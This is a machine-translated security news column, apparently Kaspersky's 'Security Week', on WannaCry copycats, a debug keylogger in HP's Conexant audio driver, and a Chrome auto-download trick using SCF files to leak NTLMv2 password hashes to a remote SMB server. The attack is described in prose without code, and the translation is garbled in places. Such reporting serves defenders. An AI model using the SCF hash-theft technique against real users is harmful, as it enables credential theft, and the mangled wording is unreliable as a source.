Security Week 20: Fake WannaCry, HP has keylogger on firewood, Chrome downloads extra

WannaCry managed to become famous so that even the illiterate part of the population of the planet heard something somewhere, and even those who have at least something to do with information security managed to thoroughly study the numerous studies of the Trojan and the FAQ on it. There hasn't been such a rush about malware yet, so we have the first Trojan superstar. And this popularity has already appeared consequences.

Even the laziest admins closed access to port 445 from the Internet (who was open for some reason) and rolled up updates, many ordinary users did the same, our and British writers synchronized the stop-domains of several WannaCry options, but it’s impossible to completely stop the epidemic . Now it turned out that someone very enterprising famously clings to this train while on the move, and is trying to wash itself a pretty penny.

Sean Dillon from RiskSense said that they had identified several new versions of WannaCry, which do not differ much from the original, but they are not encouraging - only the address of the bitcoin wallet to which the ransom is to be transferred is blatantly killed in a hex editor. And one more tiny change: the imitators, with the help of the same rough editing of the file, turned off the Trojan’s self-destruct mechanism, that is, there are no stop domains for these versions.

An excellent business scheme: you don’t need to do anything, you just adjusted the sample and released it, then it will feed itself all over the world on its own. EternalBlue + DoublePulsar and forth, nothing will stop them. It turns out that the victims of this wave will not receive their files back even after paying the ransom: after all, the owners have no key for decrypting files. In principle, this is a good lesson for those who like to support the business of run welders by ringing bitcoin, but the damage from this quasi-vonnakra can be very serious.
')
HP found the keylogger in the audio drivers

Such is the news . The Conexant audio driver installed on some computers manufactured by Hewlett with Packard writes to the log everything that the user presses on the keyboard, and neatly adds the log to C: \ Users \ Public \ MicTray.log. Nothing encrypts at the same time.

Usually, the most safeguards are puzzled over the questions of "who is to blame" and "what to do", but this time the question "WHY ?!". The reason turned out to be the most idiotic: the developers thus at the debugging stage caught bugs when pressing hot keys, but forgot to turn off.

The list of models with this "feature" is very extensive:

• HP EliteBook 820 G3 Notebook PC
• HP EliteBook 828 G3 Notebook PC
• HP EliteBook 840 G3 Notebook PC
• HP EliteBook 848 G3 Notebook PC
• HP EliteBook 850 G3 Notebook PC
• HP ProBook 640 G2 Notebook PC
• HP ProBook 650 G2 Notebook PC
• HP ProBook 645 G2 Notebook PC
• HP ProBook 655 G2 Notebook PC
• HP ProBook 450 G3 Notebook PC
• HP ProBook 430 G3 Notebook PC
• HP ProBook 440 G3 Notebook PC
• HP ProBook 446 G3 Notebook PC
• HP ProBook 470 G3 Notebook PC
• HP ProBook 455 G3 Notebook PC
• HP EliteBook 725 G3 Notebook PC
• HP EliteBook 745 G3 Notebook PC
• HP EliteBook 755 G3 Notebook PC
• HP EliteBook 1030 G1 Notebook PC
• HP ZBook 15u G3 Mobile Workstation
• HP Elite x2 1012 G1 Tablet
• HP Elite x2 1012 G1 with Travel Keyboard
• HP Elite x2 1012 G1 Advanced Keyboard
• HP EliteBook Folio 1040 G3 Notebook PC
• HP ZBook 17 G3 Mobile Workstation
• HP ZBook 15 G3 Mobile Workstation
• HP ZBook Studio G3 Mobile Workstation
• HP EliteBook Folio G1 Notebook PC

It is possible that someone has figured it out a long time ago, and uses it for their heinous purposes. The reaction of Conexant and HP themselves to the discovery was zero: when Thorsten Schröder from ModZero, who discovered the problem, tried to reach them, he received no answer either from there or from there. He had to publish a description of "vulnerability" and proof of concept, only after that vendors began to move.

But they began to move somehow specifically: the keyboard logging function in the driver remained, it was only turned off with a key in the registry. ModZero offer great HP computer users not to hope for updates, but simply to crash the C: \ Windows \ System32 \ MicTray64.exe file, donating the sound control capabilities from the buttons, and of course the log itself.

Vulnerability in Chrome allows you to steal credentials

News Research If you think that Windows 10 with the latest updates and the latest version of Chrome will protect you from evil exploit sites, then ... well, you understand. Stop thinking that way, because the DefenseCode has come up with a cunning attack through the most popular browser.

The essence is not in a software error, but in a configuration error - by default, Chrome downloads files that it considers safe from websites to it without asking for permission. And everything seems to be nothing - it does not launch them, but SCF, Explorer command files are listed in the safe list. These are text files containing two sections, one command for execution at startup, the other path to the file icon. And now the Explorer icon tries to get it automatically, again without requesting the user. But this could be a network path, somewhere on the Internet.

And again - what is dangerous here, since Explorer is just trying to load the icon, and not execute it? Just while he tries to log in to the SMB-server and gives him the username, domain, and password hash NTLMv2. Accordingly, a hacker can try to unmask the password (which takes hours for a simple password), simply log in with this data on an external service using NTLMv2 - for example, on an Exchange server - or use it inside a cracked network, which is useful for elevating privileges. For Windows 8/10 users logging in with a Microsoft account, this may lead to compromise of their accounts in OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live.

You can protect yourself from such an attack by setting a mandatory request in the Chrome settings to save the file before downloading it. Other browsers, as indicated in the DefenseCode, SCF files do not automatically load.

Antiquities

"V-944"

Nonresident dangerous virus. Typically infects .COM files of the current directory and directories marked in COMSPEC. Intercepts int 16h (keyboard) and, depending on the characters entered from the keyboard, launches a face symbol (ASCII 1) on the 25th line of the screen from right to left and back. The movement of the mug is accompanied by a buzz. Hardly enough with int 16h, can “hang” the system. Removes the read-only attribute, the file time value is set to 62 seconds.

Quote from the book "Computer viruses in MS-DOS" Eugene Kaspersky. 1992 Page 89.

Disclaimer: This column reflects only the personal opinion of its author. It may coincide with the position of Kaspersky Lab, or it may not coincide. Then how lucky.